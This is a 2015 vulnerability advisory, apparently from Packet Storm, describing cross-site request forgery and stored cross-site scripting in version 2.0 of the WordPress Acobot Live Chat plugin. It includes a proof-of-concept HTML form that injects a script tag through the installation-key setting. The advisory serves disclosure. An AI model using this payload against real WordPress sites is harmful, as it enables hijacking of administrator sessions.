WordPress Acobot Live Chat and Contact Form plugin version 2.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
bdfc48dbd7f56bb4624b57c256326b0ae156e1a91cb1158d5afbfaee526866fdTitle: WordPress 'Acobot Live Chat & Contact Form' CSRF/XSS
Version: 2.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/acobot/
Contacted WordPress: 2015/01/26
==========================================================
## Plugin description:
==========================================================
Enhance your WordPress with a virtual robot in 3 minutes or less and boost your sales like never before. It's simple, easy and fast.
## CSRF:
==========================================================
It is possible to change plugin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
==========================================================
The installation key in the admin panel is stored and displayed unsanitized. This allows an attacker to perform XSS through that field.
PoC:
Log in as admin and submit the this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=acobot&update_account=something">
<input type="text" name="acobot_token" value=""/><script>alert(1)</script>"><br />
<input type="hidden" name="acobot_code_script" value=""><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix has been released.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed